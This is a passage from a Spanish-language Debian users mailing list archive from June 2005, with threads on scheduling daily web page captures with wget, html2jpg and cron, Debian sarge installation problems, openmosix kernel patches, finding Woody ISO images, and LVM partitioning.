> > Subject: Como capturar una web diariamente
> >
> > > Hai algun programa que permita crear un demonio que todos los días la
> >
> > misma
> >
> > > hora haga una captura de una web y la guarde en formato jpg?
> > >
> > >
> > > __
> > > Renovamos el Correo Yahoo!
> > > Nuevos servicios, más seguridad
> > > http://correo.yahoo.es
> 
>   
> __ 
> Renovamos el Correo Yahoo! 
> Nuevos servicios, mas seguridad 
> http://correo.yahoo.es



La información contenida en este correo electrónico es privada y
confidencial. Cualquier uso, modificación, difusión y/o reproducción por
parte de cualquier persona distinta del destinatario está prohibida. Si Vd.
recibe este mensaje por error, por favor bórrelo y comuníquelo al remitente.




This e-mail and any attachments are confidential and intended solely
for the addressee and may also be privileged or exempt from disclosure
under applicable law. If you are not the addressee, or have received
this e-mail in error, please notify the sender immediately, delete it
from your system and do not copy, disclose or otherwise act upon any
part of this e-mail or its attachments..

Internet communications are not guaranteed to be secure or virus-free.
The Barclays Group does not accept responsibility for any loss arising
from unauthorised access to, or interference with, any Internet
communications by any third party, or from the transmission of any
viruses. Replies to this e-mail may be monitored by the Barclays
Group for operational or business reasons..

Any opinion or other information in this e-mail or its attachments
that does not relate to the business of the Barclays Group is personal
to the sender and is not given or endorsed by the Barclays Group.

Barclays Bank PLC.Registered in England and Wales (registered no. 1026167).
Registered Office: 1 Churchill Place, London, E14 5HP, United Kingdom.

Barclays Bank PLC is authorised and regulated by the Financial Services 
Authority.

Re: Como capturar una web diariamente

2005-06-10 Por tema 31

Bien, incluso puede que no se necesite wget, y ahora continuando con el 
problema, como puedo conseguir que además de crear un jpg, el susodicho 
demonio haga un login a un ftp, entre en un directorio y lo suba. Como le 
digo al ftp desde un demonio, login tal, cd cual y put esto.

O Venres 10 Xuño 2005 13:15, Gotzon Astondoa escribiu:
> Hola:
>
> Yo no lo he hecho nunca pero sé que:
>
> - wget permite bajar una página.
> - html2jpeg permite... pues eso.
> http://freshmeat.net/projects/html2jpg/
> - y el cron permite ejecutar una tarea cuando quieras
>
> ta luego...
>
> - Original Message -
> From: "31" <[EMAIL PROTECTED]>
> To: 
> Sent: Friday, June 10, 2005 12:52 PM
> Subject: Como capturar una web diariamente
>
> > Hai algun programa que permita crear un demonio que todos los días la
>
> misma
>
> > hora haga una captura de una web y la guarde en formato jpg?
> >
> >
> > __
> > Renovamos el Correo Yahoo!
> > Nuevos servicios, más seguridad
> > http://correo.yahoo.es


__
Renovamos el Correo Yahoo!
Nuevos servicios, más seguridad
http://correo.yahoo.es

Re: defraudado

2005-06-10 Por tema Aritz Beraza Garayalde [Rei]

On 6/8/05, gabriel <[EMAIL PROTECTED]> wrote:
> gabriel escribió:
> 
> > Hola lista, vaya frustración, dos años para sacar una nueva versión de
> > debian y ahora no hay manera de instalarla, ya me he descargado la
> > primera versión y la segunda con su parche que arregla la primera y no
> > hay manera de instalarlas, creo que voy a seguir con las versiones
> > testing que son más fáciles de instalar. Suerte
> >
> >
> Hola, cuando inicia el arranque el cd de debian en el boot le pongo"
> expert" para poder especificar una serie de parámetros, todo va bien
> hasta que después de seleccionar en apt los repositorios que quiero,le
> pongo cuatro de España, cuatro de Estados Unidos y cuatro de Alemania,
> luego paso a "Seleccionar e instalar paquetes"  y elijo sólo la primera
> opción la de entorno de escritorio, en ese paso ya no me deja continuar
> ni con la versión 3.1 r0, ni con la versión 3.1 r0a. La última prueba
> que estoy haciendo y parece que de momento me funciona y me está
> descargando es elegir sólo el repositorio oficial de debian.es, si al
> final lo consigo intentare después con base-config añadirle más
> repositorios. Espero que ahora me funcione. Gracias
> 
> 

Como ya te han dicho... ¿para que co poner tantas fuentes? Si son
todas iguales. En la guia de instalación recomiendadn poner unos
cercanos a los tuyos, en españa tienes varios repositorios, yo uso
rediris.

Otras puntualizaciones. Testing y stable, ahora mismo usan el mismo
instalador, el de sarge. El parche que mencionas en el instalador solo
modifica una linea en los sources list para poder tener
actualizaciones de seguridad.

Si has conseguido llegar hasta los repositorios y la instalación de
paquetes, entonces felicidades, YA tienes debian instalado y
funcionando perfectamente. No es necesario reinstalar. puedes instalar
los paquetes que quieras desde ese momento usando tasksel o apt-get
Recuerda hacer un apt-get update antes claro.

Procura que el subject del mensaje sea más descriptivo, haga un
pequeño resumen o referencia a cual es el problema. "Defraudado" no es
un buen subject.

Saludos
Aritz Beraza
-- 
Aritz Beraza Garayalde [Rei]
___
[ WWW ]  http://evangelion.homelinux.net 
[jabber]  rei[en]bulmalug.net

Re: Como capturar una web diariamente

2005-06-10 Por tema Gotzon Astondoa

Hola:

Yo no lo he hecho nunca pero sé que:

- wget permite bajar una página.
- html2jpeg permite... pues eso.
http://freshmeat.net/projects/html2jpg/
- y el cron permite ejecutar una tarea cuando quieras

ta luego...

- Original Message - 
From: "31" <[EMAIL PROTECTED]>
To: 
Sent: Friday, June 10, 2005 12:52 PM
Subject: Como capturar una web diariamente


> Hai algun programa que permita crear un demonio que todos los días la
misma
> hora haga una captura de una web y la guarde en formato jpg?
>
>
> __
> Renovamos el Correo Yahoo!
> Nuevos servicios, más seguridad
> http://correo.yahoo.es
>


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Como capturar una web diariamente

2005-06-10 Por tema 31

Hai algun programa que permita crear un demonio que todos los días la misma 
hora haga una captura de una web y la guarde en formato jpg?


__
Renovamos el Correo Yahoo!
Nuevos servicios, más seguridad
http://correo.yahoo.es

Re: Consulta sobre openmosix

2005-06-10 Por tema joseba

No es posible aplicar el parche openmosix a fuentes debian estandar. Tienes 
que "unparchear el nuecleo" (trae una utilidad muy sencilla las fuentes) y 
despues ponerle openmosix.

Pero cuando yo lo intente, me encontre con que ya habia gente que habia hecho 
el trabajo:

http://sunsite.rediris.es/mirror/clusterknoppix/

Paquetes de nucleos debian perecompilados y en fuentes, bueno bonito y barato.

y un konppix pensado expresamente para hacer cluster, asi que , ala a probar.

El Viernes 10 Junio 2005 07:08, rafael escribió:
> Quisiera saber si alguien a probado el parche openmosix en los kernels
> de Debian, o es mejor bajarme las fuentes standard del kernel y
> aplicarselo a estas.
> Si me pudiesen dar alguna recomendacion para montar un cluster de
> balanceo de carga.
> Gracias de Antemano!!


__
Renovamos el Correo Yahoo!
Nuevos servicios, más seguridad
http://correo.yahoo.es

Re: localizar jigdo de imagen Woody 3.0r5 Ã³ 6

2005-06-10 Por tema peter holm

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Angel Claudio Alvarez wrote:
> El vie, 10-06-2005 a las 00:50 +0200, peter holm escribió:
> 
>>Hola:
>>Mi Woody se "escuajaringo" al no cambiar mis repositorios de Stable a woody
>>y ahora resulta que no logro instalar con el DVD que tengo, ya he
>>formateado (tengo copias de seguridad de lo que estaba haciendo..
>>¿Donde podria localizar las imagenes (o imagen DVD) de la version 3.0r5 o
>>3.0r6 (Woody).
>>Un saludo. Peter Holm.
>>
> 
> Aca tenes la r4 apurate
> http://www.linuxiso.org/distro.php?distro=4
> 
solucionado, de las imagenes que comentas solo lograba bajar la 1.iso, asi
que he tirado por "la via ancha" y me he comprado los 7 cd + NONUS, a ver
si estos no me mandan los discos defectuosos, el anterior lo cambie y sigue
mal.
Un saludo. Peter Holm.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFCqWV3lWZhvR0ofHARAljjAKDCCl1XWtX1EK9fsbK4ebUhg5JwgQCgvfx+
wQukAvhWVN8JdEkKgXJo2ws=
=OkdR
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

LVM en sarge

2005-06-10 Por tema Unknown

hola, estoy interesado en instalar sarge sobre particiones LVM

veo que en el disco de netboot ya trae esta opcion, me atrae mucho
puesto que esto supone un maximo aprovechamiento del espacio en disco,
Tengo experiencia en LVM de instalaciones que hice en fedora (en un
pasado distante), funcionaba muy bien hasta que en una actualizacion ya
no reinicio y no hubo ningun disco de rescate en la tierra que pudiera
recuperar mi informacion :(, finalmente quede aterrado del los problemas
potenciales que tiene, ahora que debian lo soporta de manera stable me
gustaria que me contaran que tal jala y sobre todo si existen
herramientas suficientemente potentes para poder recuperarse de fallos
graves y no tan graves

Otra pregunta, no me queda muy claro cual es el fin de los grupos de
volumenes (GV), se que al hacer los volumenes puedes hacer cualquier
particion y modificarla segun se necesite pero entonces los GV?, sera
para tener varias distros en el mismo particionamiento de LVM? y sino,
es posible despues de particionar un disco completo con LVM instalarle
otra distro en una particion y que lilo o grub los puedan cargar?, que
tal guindorks?

bueno gracias por adelantado


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: como cargar modules?